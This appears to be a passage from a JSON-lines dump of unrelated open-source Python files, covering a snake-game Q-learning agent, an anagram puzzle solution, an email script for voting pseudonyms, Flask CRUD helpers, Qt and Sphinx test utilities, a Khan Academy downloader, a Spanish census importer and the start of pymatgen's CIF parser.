self.agent.Act(self.getState(head, self.food), self.MOVABLE_DIRECTION,\r\n self.reward, False)\r\n self.direction = self.movableDirections(action, self.direction)\r\n self.aim = SnakeGameEnvironment.DIRECTIONS[self.direction]\r\n\r\n clear()\r\n\r\n for body in self.snake:\r\n square(body.x, body.y, 9, 'black')\r\n\r\n for obstacle in self.obstacles:\r\n square(obstacle.x, obstacle.y, 9, 'red')\r\n\r\n square(self.food.x, self.food.y, 9, 'green')\r\n # print(np.nonzero(self.rewardMatrix))\r\n # print(np.unique(self.rewardMatrix))\r\n # print(np.argwhere(self.rewardMatrix == SnakeGameEnvironment.BLACK).flatten())\r\n update()\r\n ontimer(self.move, 1)\r\n SnakeGameEnvironment.i = SnakeGameEnvironment.i + 1\r\n\r\n def changeDirection(self, direction):\r\n directions = [Key.up, Key.right, Key.down, Key.left]\r\n self.keyboard.press(directions[direction])\r\n self.keyboard.release(directions[direction])\r\n\r\n DIRECTIONS = {'Right': vector(10, 0), 'Left': vector(-10, 0), 'Up': vector(0, 10), 'Down': vector(0, -10)}\r\n\r\n def setup(self):\r\n try:\r\n setup(SnakeGameEnvironment.MATRIX_SIZE, SnakeGameEnvironment.MATRIX_SIZE,\r\n int(SnakeGameEnvironment.MATRIX_SIZE / 2) + 10, 0)\r\n hideturtle()\r\n tracer(False)\r\n listen()\r\n onkey(lambda: self.change(10, 0, 'Right'), 'Right')\r\n onkey(lambda: self.change(-10, 0, 'Left'), 'Left')\r\n onkey(lambda: self.change(0, 10, 'Up'), 'Up')\r\n onkey(lambda: self.change(0, -10, 'Down'), 'Down')\r\n self.move()\r\n done()\r\n\r\n return None\r\n except turtle.Terminator:\r\n pass\r\n\r\n def getAvailableDirections(self):\r\n if self.direction == 'Right':\r\n return ['Right', 'Up', 'Down']\r\n elif self.direction == 'Left':\r\n return ['Left', 'Up', 'Down']\r\n elif self.direction == 'Up':\r\n return ['Right', 'Up', 'Left']\r\n else:\r\n return ['Right', 'Left', 'Down']\r\n\r\n MOVABLE_DIRECTION = ['GO_LEFT', 'GO_FORWARD', 'GO_RIGHT']\r\n\r\n def movableDirections(self, movingDirection, currentDirection):\r\n # currentDirection = self.direction\r\n if currentDirection == 'Right':\r\n if movingDirection == 'GO_LEFT':\r\n return 'Up'\r\n elif movingDirection == 'GO_RIGHT':\r\n return 'Down'\r\n else:\r\n return currentDirection\r\n elif currentDirection == 'Left':\r\n if movingDirection == 'GO_LEFT':\r\n return 'Down'\r\n elif movingDirection == 'GO_RIGHT':\r\n return 'Up'\r\n else:\r\n return currentDirection\r\n elif currentDirection == 'Up':\r\n if movingDirection == 'GO_LEFT':\r\n return 'Left'\r\n elif movingDirection == 'GO_RIGHT':\r\n return 'Right'\r\n else:\r\n return currentDirection\r\n else:\r\n if movingDirection == 'GO_LEFT':\r\n return 'Right'\r\n elif movingDirection == 'GO_RIGHT':\r\n return 'Left'\r\n else:\r\n return currentDirection\r\n\r\n\r\n def getNextSquareState(self, squareSpace):\r\n\r\n if not self.inside(squareSpace) or squareSpace in self.snake or squareSpace in self.obstacles:\r\n return -1\r\n if squareSpace == self.food:\r\n return 1\r\n return 0\r\n\r\n def SigNum(self, x):\r\n if x < 0:\r\n return -1\r\n if x > 0:\r\n return 1\r\n else:\r\n return 0\r\n\r\n def GetQuadrant(self, coord):\r\n (sign_x, sign_y) = (self.SigNum(coord[0]), self.SigNum(coord[1]))\r\n\r\n if sign_x == 0:\r\n qx = 0\r\n elif sign_x == 1:\r\n qx = 1\r\n else:\r\n qx = -1\r\n\r\n if sign_y == 0:\r\n qy = 0\r\n elif sign_y == 1:\r\n qy = 1\r\n else:\r\n qy = -1\r\n\r\n return (qx, qy)\r\n\r\n def TransformQuadrantBasedOnDirection(self, coord, d, directions):\r\n\r\n (x, y) = coord\r\n\r\n for direction in directions:\r\n if d == direction:\r\n if d == 'Left': (x, y) = (y, -x)\r\n if d == 'Right': (x, y) = (-y, x)\r\n if d == 'Down': (x, y) = (-x, -y)\r\n\r\n return self.GetQuadrant((x, y))\r\n\r\n def transformMove(self, head, movableDirection):\r\n tempHead = head.copy()\r\n direction = self.movableDirections(movableDirection, self.direction)\r\n tempHead.move(SnakeGameEnvironment.DIRECTIONS[direction])\r\n return tempHead\r\n\r\n def getState(self, head, food):\r\n square_description = []\r\n fruit = food.copy()\r\n head = head.copy()\r\n for direction in SnakeGameEnvironment.MOVABLE_DIRECTION:\r\n tempHead = self.transformMove(head, direction)\r\n square_description.append(self.getNextSquareState(tempHead))\r\n # print(head,fruit)\r\n head = self.coordinateSystemConverter(head)\r\n fruit = self.coordinateSystemConverter(fruit)\r\n # print(head,fruit)\r\n head = (head[0], -head[1])\r\n fruit = (fruit[0], -fruit[1])\r\n\r\n (x, y) = (fruit[0] - head[0], fruit[1] - head[1])\r\n (qx, qy) = self.TransformQuadrantBasedOnDirection((x, y),\r\n self.direction, self.getAvailableDirections())\r\n mapped_state = (square_description[0], square_description[1],\r\n square_description[2], qx, qy)\r\n return mapped_state\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nimport _pickle as cPickle\r\nimport math\r\nimport random\r\nimport sys\r\n\r\n\r\n\r\n\r\nclass Agent():\r\n\r\n Q = {}\r\n\r\n def __init__(self, epsilon, trained_file=\"\", gamma=0.9, alpha=0.8):\r\n self.gamma = gamma\r\n self.alpha = alpha\r\n if epsilon == -1.0:\r\n self.e = 0.5\r\n else:\r\n self.e = epsilon\r\n self.old_state = None\r\n self.old_action = None\r\n self.Q = {}\r\n self.N = {}\r\n self.count = 0\r\n\r\n if trained_file is not \"\":\r\n try:\r\n (self.e, self.count, self.Q) = cPickle.load(open(trained_file))\r\n except IOError as e:\r\n sys.stderr.write((\"File \" + trained_file + \" not found. \\n\"))\r\n sys.exit(1)\r\n\r\n return\r\n\r\n def UpdateQ(self, state, action, state_, action_, reward, explore):\r\n # raise NotImplemented()\r\n if not state:\r\n return\r\n\r\n q = self.Q[state][action]\r\n if not state_:\r\n q += self.alpha * (reward - q)\r\n else:\r\n q_ = max(self.Q[state_].values())\r\n q += self.alpha * (reward + self.gamma * q_ - q)\r\n\r\n self.Q[state][action] = q\r\n\r\n def Act(self, state, actions, reward, episode_ended):\r\n self.count += 1\r\n\r\n # print(actions,rewards)\r\n if self.count == 10000:\r\n self.e -= self.e / 20\r\n self.count = 1000\r\n\r\n # epsilon-greedy\r\n if state not in self.Q:\r\n self.Q[state] = {}\r\n print(\"New snake arrived\")\r\n for action in actions:\r\n self.Q[state][action] = 10\r\n\r\n # Explore\r\n fg = random.random()\r\n # print(fg , self.e)\r\n if fg < self.e:\r\n action = actions[random.randint(0, len(actions) - 1)]\r\n explore = True\r\n\r\n else:\r\n action = max(actions, key=lambda x: self.Q[state][x])\r\n explore = False\r\n\r\n if episode_ended:\r\n self.UpdateQ(self.old_state, self.old_action, None, None, reward,\r\n explore)\r\n else:\r\n self.UpdateQ(self.old_state, self.old_action, state, action, reward,\r\n explore)\r\n\r\n self.old_state = state\r\n self.old_action = action\r\n return action\r\n\r\n def WriteKnowledge(self, filename):\r\n fp = open(filename, \"w\")\r\n cPickle.dump((self.e, self.count, self.Q), fp)\r\n fp.close()\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n agent = Agent(0.5)\r\n\r\n\r\n for i in range(2000):\r\n game = SnakeGameEnvironment(agent)\r\n game.setup()\r\n # print(agent.Q)\r\n # input(\"hi\")\r\n print(\"My score is: \", game.getreward())\r\n f = open(\"temp.pkl\", 'wb')\r\n cPickle.dump(agent.Q, f)\r\n\r\n","repo_name":"yadagirianjali13/AI_Final-project","sub_path":"Q Learning.py","file_name":"Q Learning.py","file_ext":"py","file_size_in_byte":12274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"39705322331","text":"# 1D1P Day350 BOJ 1919번 애너그램 만들기 문제 - 2021.10.20\n\ndef count(string):\n arr = [0] * 26\n for i in range(ord('a'), ord('z')+1):\n cnt = 0\n for digit in string:\n if digit == chr(i):\n cnt += 1\n arr[i-ord('a')] = cnt\n \n return arr\n\na = list(input())\nb = list(input())\na.sort()\nb.sort()\na_count = count(a)\nb_count = count(b)\n\nanswer = 0\nfor i in range(26):\n answer += abs(a_count[i] - b_count[i])\n\nprint(answer)","repo_name":"WonHwang/1D1P","sub_path":"2021_10_20_Day350/1919.py","file_name":"1919.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"20456672200","text":"#!/usr/bin/python3\n\n# https://myaccount.google.com/lesssecureapps\n\nfrom random import SystemRandom\n\nimport smtplib, ssl\nimport time\n\nfrom collections import namedtuple\n\nsender = \"pseudo@infoaed.ee\"\nbulletin = \"https://etherpad.wikimedia.org/p/psephos-demosia\"\n\nmessage_template = \"\"\"From: Uduloor <%s>\nTo: %s\nSubject: Your pseudonym for voting at the upcoming election\n\nYour pseudonym for voting at the upcoming election is:\n\n* %s\n\nVoting takes place at:\n\n* %s\n\nGuidelines in nutshell:\n\n* To cast your vote, please write down your pseudonym followed by your choice at the election.\n* Make sure you write this information on a separate line at the bulletin board to avoid any confusion.\n* To preserve your anonymity in this secret election you *should not* log in to the bulletin board.\n* For extra caution you can use the private mode of your web browser or even special anonymity preserving browser.\n* Before voting is closed, please make sure your vote is still correctly displayed at the bulletin board.\n* After voting is closed you (or actually anyone) can tally the votes to make sure everything was done correctly.\n\nHappy voting!\n\nSincereley \"etc\"\nUduloor\n\"\"\"\n\nvoters_in_text = \"\"\"tramm@infoaed.ee\nboamaod@gmail.com\ntramm@p6drad-teel.net\ntramm@wikimedia.ee\n\"\"\"\n\nunique_words = \"\"\"narcissus\ntaraxacum\ntulipa\nrhododendron\npapaver\nmimosa\niris\nasparagus\nanemone\nalcea\nhepatica\ntrollius\nranunculus\ncaltha\nrosa\ntrifolium\nmelampyrum\nsyringa\nsolanum\nligularia\ncurcuma\nantirrhinum\n\"\"\"\n\ncode_range = range(100, 999)\n\nDRY_RUN = True\n\nurl = \"smtp.gmail.com\"\nport = 465\nusername = \"boamaod\"\npassword = \"secret123\"\n\npseudo_id = namedtuple('pseudo_id', ['pseudonym', 'code', 'cryptonym'])\n\nvoter_list = voters_in_text.strip().splitlines()\nword_list = unique_words.strip().splitlines()\n\nrandom = SystemRandom()\n\nrandom_words = random.sample(word_list, len(voter_list))\nrandom_keys = random.sample(code_range, len(voter_list))\n\nprint(\"There are %d voters in upcoming election:\\n\" % len(voter_list))\n\nfor voter in voter_list:\n print(voter)\n\nrandom.shuffle(voter_list)\n\nprint()\n\nprint(\"Distributing pseudonyms...\\n\")\n\npseudo = []\n\nfor i in range(len(voter_list)):\n current = pseudo_id(random_words[i], str(random_keys[i]), random_words[i] + str(random_keys[i]))\n pseudo.append(current)\n\ni = -1\n\ntry:\n \n if not DRY_RUN: \n server = smtplib.SMTP_SSL(url, port, context=ssl.create_default_context())\n server.login(username, password)\n \n for i in range(len(voter_list)):\n\n receiver = voter_list[i].split()[0]\n message = message_template % (sender, receiver, pseudo[i].cryptonym, bulletin)\n \n print(\"*\", pseudo[i].pseudonym)\n \n if not DRY_RUN:\n server.sendmail(sender, receiver, message.encode(\"utf8\"))\n \n time.sleep(1)\n \n if not DRY_RUN:\n server.quit()\n \n print()\n \n print(\"Delivered %d pseudonyms.\" % (i+1))\n \nexcept Exception as e:\n\n print(\"Delivered %d pseudonyms.\" % (i+1))\n \n print(\"ERROR:\", e)\n\nprint()\n\nprint(\"Write 'end' to close voting and publish audit information.\")\n\nprint()\n\nwhile(input(\"> \") != \"end\"):\n pass\n\nprint()\nprint(\"Cryptonyms:\")\n\nprint()\n\nfor i in range(len(voter_list)):\n print(\"*\", pseudo[i].cryptonym)\n\nprint()\n\nprint(\"Thanks for taking digital democracy seriously!\")\n","repo_name":"infoaed/uduloor","sub_path":"uduloor.py","file_name":"uduloor.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"27903765093","text":"from flask import jsonify, redirect\nfrom models import db, Participant\n\ndef get_all_participants(): \n all_participants = Participant.query.all()\n results = [participant.as_dict() for participant in all_participants]\n return jsonify(results)\n\ndef get_participant(id):\n participant = Participant.query.get(id) \n if participant: \n return jsonify(participant.as_dict())\n else:\n raise Exception(f'No participant at id: {id}') \n\ndef create_participant(**form_kwargs):\n new_participant = Participant(**form_kwargs)\n db.session.add(new_participant)\n db.session.commit()\n return jsonify(new_participant.as_dict())\n\ndef update_participant(id, **update_values): \n participant = Participant.query.get(id) \n if participant:\n for key, value in update_values.items(): \n setattr(participant, key, value) \n db.session.commit()\n return jsonify(participant.as_dict())\n else:\n raise Exception(f'No participant at id: {id}')\n\n\n\ndef destroy_participant(id):\n participant = Participant.query.get(id)\n if participant:\n db.session.delete(participant)\n db.session.commit()\n return redirect('/participants')\n else:\n raise Exception(f'No participant at id: {id}')","repo_name":"smashflashtech/ASDDC-backend","sub_path":"crud/participant_crud.py","file_name":"participant_crud.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"11088155343","text":"from PySide6 import QtCore, QtGui, QtWidgets\nfrom joulescope_ui import pubsub_singleton, N_, register, get_instance, get_unique_id, get_topic_name\n\n\ndef settings_action_create(obj, menu):\n def on_action():\n pubsub_singleton.publish('registry/settings/actions/!edit', obj)\n\n action = QtGui.QAction(menu)\n action.setText(N_('Settings'))\n action.triggered.connect(on_action)\n menu.addAction(action)\n return action\n","repo_name":"jetperch/pyjoulescope_ui","sub_path":"joulescope_ui/widget_tools.py","file_name":"widget_tools.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"86"} +{"seq_id":"15075682332","text":"from __future__ import (print_function, division, unicode_literals,\n absolute_import)\n\nimport sys\n\nimport pytest\n\n\nif sys.version_info[0] < 3:\n sip = pytest.importorskip('sip')\n sip.setapi('QString', 2)\n text_type = unicode\nelse:\n text_type = str\n\nQtCore = pytest.importorskip('PyQt4.QtCore')\nQtGui = pytest.importorskip('PyQt4.QtGui')\nQtWebKit = pytest.importorskip('PyQt4.QtWebKit')\n\n\n# Qt application setup and rendering takes time, these tests are slow\npytestmark = pytest.mark.slow\n\n\ndef pytest_funcarg__app(request):\n \"\"\"\n Application with mocked lookup.\n \"\"\"\n request.applymarker(pytest.mark.mock_lookup)\n return request.getfuncargvalue('app')\n\n\ndef pytest_funcarg__qt_app(request):\n \"\"\"\n A QApplication to drive rendering tests.\n \"\"\"\n return request.cached_setup(lambda: QtGui.QApplication([]), scope='module')\n\n\ndef pytest_funcarg__web_page(request):\n \"\"\"\n Return a web page object for the rendered ``content``.\n \"\"\"\n request.getfuncargvalue('qt_app')\n # keep the web page alive during execution of the current test. Prevents\n # the python GC from cleaning the web_page object at the end of this\n # function and thus prevents segfaults when accessing elements in the page.\n web_page = request.cached_setup(QtWebKit.QWebPage, scope='function')\n main_frame = web_page.mainFrame()\n index_html_file = request.getfuncargvalue('index_html_file')\n # wait for \"loadFinished\" signal to make sure that the whole content is\n # parsed before we run the test. see\n # http://www.developer.nokia.com/Community/Wiki/How_to_wait_synchronously_for_a_Signal_in_Qt\n loop = QtCore.QEventLoop()\n main_frame.loadFinished.connect(loop.quit)\n main_frame.load(QtCore.QUrl(text_type(index_html_file)))\n loop.exec_()\n return web_page\n\n\ndef pytest_funcarg__reference(request):\n \"\"\"\n Return the issue reference element in the ``main_frame``.\n \"\"\"\n web_page = request.getfuncargvalue('web_page')\n issue_element = web_page.mainFrame().findFirstElement('.xref.issue')\n if issue_element.isNull():\n raise ValueError('null element')\n return issue_element\n\n\ndef pytest_funcarg__text_decoration(request):\n \"\"\"\n Return the ``text-decoration`` style property of the ``reference`` element.\n \"\"\"\n reference = request.getfuncargvalue('reference')\n resolve_strategy = QtWebKit.QWebElement.CascadedStyle\n return reference.styleProperty('text-decoration', resolve_strategy)\n\n\n@pytest.mark.with_issue(id='10', title='Eggs', closed=False, url='eggs')\ndef test_open_issue(text_decoration):\n \"\"\"\n Test that an open issue is not struck through.\n \"\"\"\n assert not text_decoration\n\n\n@pytest.mark.with_issue(id='10', title='Eggs', closed=True, url='eggs')\ndef test_closed_issue(text_decoration):\n \"\"\"\n Test that a closed issue is struck through.\n \"\"\"\n assert text_decoration == 'line-through'\n","repo_name":"ignatenkobrain/sphinxcontrib-issuetracker","sub_path":"tests/test_stylesheet.py","file_name":"test_stylesheet.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"86"} +{"seq_id":"40467445068","text":"#!/usr/bin/env python3\nimport kapi\nimport argparse, sys\n\ndef read_cmd():\n \"\"\"Function for reading command line options.\"\"\"\n desc = \"Script for downloading Khan Academy content tree.\" \n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('-c','--content', dest='content_type', required = True, help='Which kind of content should we download? Options: video|exercise|article|topic')\n parser.add_argument('-l', '--lang', dest='lang', default = 'en', help='Language of the topic tree. (US by default)')\n return parser.parse_args()\n\n# Currently, article type does not work\n# Each article need to be downloaded separately via kapi.download_article(article_id)\nAVAILABLE_CONTENT_TYPES = ['video', 'exercise', 'topic']\n\nif __name__ == \"__main__\":\n\n opts = read_cmd()\n\n if opts.content_type not in AVAILABLE_CONTENT_TYPES:\n print(\"ERROR: invalid content type argument:\", opts.content_type)\n print(\"Available:\", AVAILABLE_CONTENT_TYPES)\n exit(1)\n\n khan_tree = kapi.KhanContentTree(opts.lang, opts.content_type)\n khan_api = kapi.KhanAPI(opts.lang)\n tree = khan_api.download_topic_tree(opts.content_type)\n if tree is not None:\n khan_tree.save(tree)\n print(\"Successfully downloaded Khan %s topic tree for locale %s\" % (opts.content_type, opts.lang))\n else:\n print(\"ERROR: Could not download topic tree for locale \" + opts.lang)\n sys.exit(1)\n\n","repo_name":"KhanovaSkola/KSTools","sub_path":"ka_deprecated/download_khan_tree.py","file_name":"download_khan_tree.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"86362657017","text":"import re\nimport os\nfrom zipfile import ZipFile\n\nimport xlrd\n\nfrom datasource_common.dataset_importer import DatasetTemporaryTableImporter\nfrom datasource_common.dataset_provider import DatasetProvider\nfrom datasource_common.downloads import download_file\nfrom datasource_common.log import log\n\n\nINDICATORS_FILE_URL = 'http://www.ine.es/censos2011_datos/indicadores_seccen_rejilla.xls'\nCENSUS_DATA_URL = 'http://www.ine.es/censos2011_datos/indicadores_seccion_censal_csv.zip'\n\n\nclass CensusProvider(DatasetProvider):\n def get_dataset(self):\n indicators_file = self.download_indicators()\n census_zip_file = self.download_census_zip()\n census_csv_files = self.extract_census_csv_files(census_zip_file)\n return {\n 'indicators_file': indicators_file,\n 'census_csv_files': census_csv_files,\n }\n\n def download_indicators(self):\n description_file = os.path.join(self.tmpdir.name, 'indicators.xls')\n log.info('Downloading indicators file')\n download_file(INDICATORS_FILE_URL, description_file)\n return description_file\n\n def download_census_zip(self):\n census_zip_file = os.path.join(self.tmpdir.name, 'census_csv.zip')\n log.info('Downloading census data')\n download_file(CENSUS_DATA_URL, census_zip_file)\n return census_zip_file\n\n def extract_census_csv_files(self, census_zip_file):\n log.info('Extracting census data')\n with ZipFile(census_zip_file, 'r') as zip:\n csv_files = [\n os.path.join(self.tmpdir.name, filename)\n for filename in zip.namelist()\n if filename.endswith('.csv')\n ]\n zip.extractall(self.tmpdir.name)\n\n return csv_files\n\n\nclass CensusImporter(DatasetTemporaryTableImporter):\n table_name = 'census_spain'\n dataset_provider_class = CensusProvider\n\n def create_temporary_table(self):\n indicators = self._get_indicators()\n\n table_fields = [\n ('ccaa', 'CHAR(2) NOT NULL'),\n ('cpro', 'CHAR(2) NOT NULL'),\n ('cmun', 'CHAR(3) NOT NULL'),\n ('dist', 'CHAR(2) NOT NULL'),\n ('secc', 'CHAR(3) NOT NULL'),\n ]\n table_fields.extend([\n (indicator_code, 'BIGINT',)\n for indicator_code, _ in indicators\n ])\n\n field_sql = ',\\n'.join([\n f'{field_name} {field_type}'\n for field_name, field_type in table_fields\n ])\n log.info('Creating census table')\n self.cur.execute(\n f'CREATE TABLE {self.temporary_table_name} ({field_sql});'\n )\n for indicator_code, indicator_label in indicators:\n self.cur.execute(\n f'COMMENT ON COLUMN {self.temporary_table_name}.{indicator_code} IS %s;',\n (indicator_label,)\n )\n\n def _get_indicators(self):\n book = xlrd.open_workbook(self.dataset['indicators_file'])\n indicator_rx = re.compile(r't\\d+_\\d+')\n indicators = []\n\n for sheet in book.sheets():\n for row in sheet.get_rows():\n indicator_code = row[0].value\n if indicator_rx.fullmatch(indicator_code):\n indicator_label = row[1].value\n indicator = indicator_code, indicator_label,\n indicators.append(indicator)\n\n return indicators\n\n def populate_table(self):\n for csv_file in self.dataset['census_csv_files']:\n log.info('Importing data from: %s', os.path.basename(csv_file))\n with open(csv_file, 'rb') as f:\n f.readline() # skip the header\n self.cur.copy_from(f, self.temporary_table_name, sep=',', null='')\n\n def create_indexes(self):\n log.info('Creating census table indexes')\n self.cur.execute(\n 'ALTER TABLE {} '\n 'ADD PRIMARY KEY(cpro, cmun, dist, secc);'\n .format(self.temporary_table_name))\n self.cur.execute(\n 'CREATE INDEX province_municipality_idx ON {} '\n '(cpro, cmun);'\n .format(self.temporary_table_name))\n","repo_name":"vfernandezmartinez/open_data_catalog","sub_path":"spain_census_datasource/census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27711884648","text":"from __future__ import division, unicode_literals, print_function\n\nimport math\nimport re\nimport os\nimport textwrap\nimport warnings\nfrom collections import OrderedDict, deque\n\nimport six\nfrom six.moves import zip, cStringIO\n\nimport numpy as np\nfrom functools import partial\n\ntry:\n from inspect import getfullargspec as getargspec\nexcept ImportError:\n from inspect import getargspec\nfrom itertools import groupby\nfrom pymatgen.core.periodic_table import Element, Specie, get_el_sp, DummySpecie\nfrom monty.io import zopen\nfrom pymatgen.util.coord_utils import in_coord_list_pbc, pbc_diff, \\\n find_in_coord_list_pbc\nfrom monty.string import remove_non_ascii\nfrom pymatgen.core.lattice import Lattice\nfrom pymatgen.core.structure import Structure\nfrom pymatgen.core.composition import Composition\nfrom pymatgen.core.operations import SymmOp\nfrom pymatgen.symmetry.groups import SpaceGroup, SYMM_DATA\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\nfrom pymatgen.electronic_structure.core import Magmom\nfrom pymatgen.core.operations import MagSymmOp\nfrom pymatgen.symmetry.maggroups import MagneticSpaceGroup\n\n\"\"\"\nWrapper classes for Cif input and output from Structures.\n\"\"\"\n\n__author__ = \"Shyue Ping Ong, Will Richards, Matthew Horton\"\n__copyright__ = \"Copyright 2011, The Materials Project\"\n__version__ = \"4.0\"\n__maintainer__ = \"Shyue Ping Ong\"\n__email__ = \"shyuep@gmail.com\"\n__status__ = \"Production\"\n__date__ = \"Sep 23, 2011\"\n\nsub_spgrp = partial(re.sub, r\"[\\s_]\", \"\")\n\nspace_groups = {sub_spgrp(k): k\n for k in SYMM_DATA['space_group_encoding'].keys()}\n\nspace_groups.update({sub_spgrp(k): k\n for k in SYMM_DATA['space_group_encoding'].keys()})\n\n_COD_DATA = None\n\n\ndef _get_cod_data():\n global _COD_DATA\n if _COD_DATA is None:\n import pymatgen\n with open(os.path.join(pymatgen.symmetry.__path__[0],\n \"symm_ops.json\")) \\\n as f:\n import json\n _COD_DATA = json.load(f)\n\n return _COD_DATA\n\n\nclass CifBlock(object):\n maxlen = 70 # not quite 80 so we can deal with semicolons and things\n\n def __init__(self, data, loops, header):\n \"\"\"\n Object for storing cif data. All data is stored in a single dictionary.\n Data inside loops are stored in lists in the data dictionary, and\n information on which keys are grouped together are stored in the loops\n attribute.\n\n Args:\n data: dict or OrderedDict of data to go into the cif. Values should\n be convertible to string, or lists of these if the key is\n in a loop\n loops: list of lists of keys, grouped by which loop they should\n appear in\n header: name of the block (appears after the data_ on the first\n line)\n \"\"\"\n self.loops = loops\n self.data = data\n # AJ says: CIF Block names cannot be more than 75 characters or you\n # get an Exception\n self.header = header[:74]\n\n def __eq__(self, other):\n return self.loops == other.loops \\\n and self.data == other.data \\\n and self.header == other.header\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __str__(self):\n \"\"\"\n Returns the cif string for the data block\n \"\"\"\n s = [\"data_{}\".format(self.header)]\n keys = self.data.keys()\n written = []\n for k in keys:\n if k in written:\n continue\n for l in self.loops:\n # search for a corresponding loop\n if k in l:\n s.append(self._loop_to_string(l))\n written.extend(l)\n break\n if k not in written:\n # k didn't belong to a loop\n v = self._format_field(self.data[k])\n if len(k) + len(v) + 3 < self.maxlen:\n s.append(\"{} {}\".format(k, v))\n else:\n s.extend([k, v])\n return \"\\n\".join(s)\n\n def _loop_to_string(self, loop):\n s = \"loop_\"\n for l in loop:\n s += '\\n ' + l\n for fields in zip(*[self.data[k] for k in loop]):\n line = \"\\n\"\n for val in map(self._format_field, fields):\n if val[0] == \";\":\n s += line + \"\\n\" + val\n line = \"\\n\"\n elif len(line) + len(val) + 2 < self.maxlen:\n line += \" \" + val\n else:\n s += line\n line = '\\n ' + val\n s += line\n return s\n\n def _format_field(self, v):\n v = v.__str__().strip()\n if len(v) > self.maxlen:\n return ';\\n' + textwrap.fill(v, self.maxlen) + '\\n;'\n # add quotes if necessary\n if v == '':\n return '\"\"'\n if (\" \" in v or v[0] == \"_\") \\\n and not (v[0] == \"'\" and v[-1] == \"'\") \\\n and not (v[0] == '\"' and v[-1] == '\"'):\n if \"'\" in v:\n q = '\"'\n else:\n q = \"'\"\n v = q + v + q\n return v\n\n @classmethod\n def _process_string(cls, string):\n # remove comments\n string = re.sub(r\"(\\s|^)#.*$\", \"\", string, flags=re.MULTILINE)\n # remove empty lines\n string = re.sub(r\"^\\s*\\n\", \"\", string, flags=re.MULTILINE)\n # remove non_ascii\n string = remove_non_ascii(string)\n\n # since line breaks in .cif files are mostly meaningless,\n # break up into a stream of tokens to parse, rejoining multiline\n # strings (between semicolons)\n q = deque()\n multiline = False\n ml = []\n # this regex splits on spaces, except when in quotes.\n # starting quotes must not be preceded by non-whitespace\n # (these get eaten by the first expression)\n # ending quotes must not be followed by non-whitespace\n p = re.compile(r'''([^'\"\\s][\\S]*)|'(.*?)'(?!\\S)|\"(.*?)\"(?!\\S)''')\n for l in string.splitlines():\n if multiline:\n if l.startswith(\";\"):\n multiline = False\n q.append(('', '', '', ' '.join(ml)))\n ml = []\n l = l[1:].strip()\n else:\n ml.append(l)\n continue\n if l.startswith(\";\"):\n multiline = True\n ml.append(l[1:].strip())\n else:\n for s in p.findall(l):\n # s is tuple. location of the data in the tuple\n # depends on whether it was quoted in the input\n q.append(s)\n return q\n\n @classmethod\n def from_string(cls, string):\n q = cls._process_string(string)\n header = q.popleft()[0][5:]\n data = OrderedDict()\n loops = []\n while q:\n s = q.popleft()\n # cif keys aren't in quotes, so show up in s[0]\n if s[0] == \"_eof\":\n break\n if s[0].startswith(\"_\"):\n data[s[0]] = \"\".join(q.popleft())\n elif s[0].startswith(\"loop_\"):\n columns = []\n items = []\n while q:\n s = q[0]\n if s[0].startswith(\"loop_\") or not s[0].startswith(\"_\"):\n break\n columns.append(\"\".join(q.popleft()))\n data[columns[-1]] = []\n while q:\n s = q[0]\n if s[0].startswith(\"loop_\") or s[0].startswith(\"_\"):\n break\n items.append(\"\".join(q.popleft()))\n n = len(items) // len(columns)\n assert len(items) % n == 0\n loops.append(columns)\n for k, v in zip(columns * n, items):\n data[k].append(v.strip())\n elif \"\".join(s).strip() != \"\":\n warnings.warn(\"Possible error in cif format\"\n \" error at {}\".format(\"\".join(s).strip()))\n return cls(data, loops, header)\n\n\nclass CifFile(object):\n \"\"\"\n Reads and parses CifBlocks from a .cif file or string\n \"\"\"\n\n def __init__(self, data, orig_string=None, comment=None):\n \"\"\"\n Args:\n data (OrderedDict): Of CifBlock objects.å\n orig_string (str): The original cif string.\n comment (str): Comment string.\n \"\"\"\n self.data = data\n self.orig_string = orig_string\n self.comment = comment or \"# generated using pymatgen\"\n\n def __str__(self):\n s = [\"%s\" % v for v in self.data.values()]\n return self.comment + \"\\n\" + \"\\n\".join(s) + \"\\n\"\n\n @classmethod\n def from_string(cls, string):\n d = OrderedDict()\n for x in re.split(r\"^\\s*data_\", \"x\\n\" + string,\n flags=re.MULTILINE | re.DOTALL)[1:]:\n\n # Skip over Cif block that contains powder diffraction data.\n # Some elements in this block were missing from CIF files in Springer materials/Pauling file DBs.\n # This block anyway does not contain any structure information, and CifParser was also not parsing it.\n if 'powder_pattern' in re.split(r\"\\n\", x, 1)[0]:\n continue\n c = CifBlock.from_string(\"data_\" + x)\n d[c.header] = c\n return cls(d, string)\n\n @classmethod\n def from_file(cls, filename):\n with zopen(filename, \"rt\", errors=\"replace\") as f:\n return cls.from_string(f.read())\n\nclass CifParser(object):\n \"\"\"\n Parses a cif file\n\n Args:\n filename (str): Cif filename. bzipped or gzipped cifs are fine too.\n occupancy_tolerance (float): If total occupancy of a site is between 1\n and occupancy_tolerance, the occupancies will be scaled down to 1.\n site_tolerance (float): This tolerance is used to determine if two\n sites are sitting in the same position, in which case they will be\n combined to a single disordered site. Defaults to 1e-4.\n 